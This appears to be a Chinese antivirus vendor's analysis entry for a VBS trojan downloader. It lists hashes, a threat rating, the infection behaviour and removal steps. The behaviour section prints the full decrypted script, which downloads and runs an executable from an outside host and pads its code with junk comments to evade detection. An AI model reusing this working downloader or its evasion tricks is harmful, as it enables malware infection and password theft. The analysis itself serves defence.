一、 病毒标签:
病毒名称: Trojan-Downloader.VBS.Agent.no
病毒类型: 下载者
|
文件大小 : |
5849 byte |
|
文件类型 : |
ASCII text, with very long lines, with CRLF line terminators |
|
MD5 : |
a9132fd9dfef25b81f4d18412bd1ac5e |
|
SHA1 : |
7ecf64fdebb63614f1ad526f339863e7c7c274d6 |
公开范围: 完全公开
危害等级: C
开发工具: VBS
命名对照:
|
F-SECURE |
5.51.6100 |
2008.05.08.06 |
2008-05-08 |
Trojan-Downloader.VBS.Agent.no[AVP] |
12.766 |
二、 病毒描述:
该病毒为VBS下载者,通过脚本加密进行免杀,躲避了大部分杀毒软件的查杀。
三、 行为分析:
以下是解密完的脚本代码:
on error resume next
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c set date=%date% &&date 2007-4-1 &&ping -n 50 127.0.0.1&&date %date%",vbhide
iLocal = LCase("c:\MSN.exe"):iRemote = LCase("http://www.lslz168.com/data/2.exe")
'if 1=2 then Wscript.echo "Impossible!"
wscript.sleep 10000
'if 1=2 then Wscript.echo "Impossible!"
Set xPost = CreateObject("Microsoft.XMLHTTP")
'if 1=2 then Wscript.echo "Impossible!"
xPost.Open "GET",iRemote,0
'if 1=2 then Wscript.echo "Impossible!"
xPost.Send()
'if 1=2 then Wscript.echo "Impossible!"
Set sGet = CreateObject("ADODB.Stream")
'if 1=2 then Wscript.echo "Impossible!"
sGet.Mode = 3
'if 1=2 then Wscript.echo "Impossible!"
sGet.Type = 1
'if 1=2 then Wscript.echo "Impossible!"
sGet.Open()
'if 1=2 then Wscript.echo "Impossible!"
sGet.Write(xPost.responseBody)
'if 1=2 then Wscript.echo "Impossible!"
sGet.SaveToFile iLocal,2
'if 1=2 then Wscript.echo "Impossible!"
Set Runner=CreateObject("Wscript.Shell")
'if 1=2 then Wscript.echo "Impossible!"
Runner.run iLocal
设置时间为2007-4-1
下载文件http://www.lslz168.com/data/2.exe并执行。
2.exe是自解压程序,为盗号木马病毒。
添加启动项目:
注册表键: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注册表值: {083A5F21-BCB9-4B21-A121-2584BEEFBFEF}
类型: REG_SZ
值:C:\WINDOWS\Debug\29124D4AA81F.dll
解决方案:
强制删除C:\WINDOWS\Debug\29124D4AA81F.dll
删除启动项目:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{083A5F21-BCB9-4B21-A121-2584BEEFBFEF}
用HOSTS屏蔽www.lslz168.com
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
%Windir%\ WINDODWS所在目录
%DriveLetter%\ 逻辑驱动器根目录
%ProgramFiles%\ 系统程序默认安装目录
%HomeDrive% = C:\ 当前启动的系统的所在分区
%Documents and Settings%\ 当前用户文档根目录
A级
大面积感染流行,并具有以下条件中的任意一个给网络造成严重压力、开有后门、反制AV技术。
B级
有一定的感染流行面积,或者有鲜明的技术特点值得进一步关注,或为既往A级蠕虫比较成熟的变种
C级
有少量感染流行,或虽然有一定感染流行面积,但是既往B级蠕虫变种。
D级
有极少量感染流行,但有一定潜在威胁。
E级
没有发现感染流行。
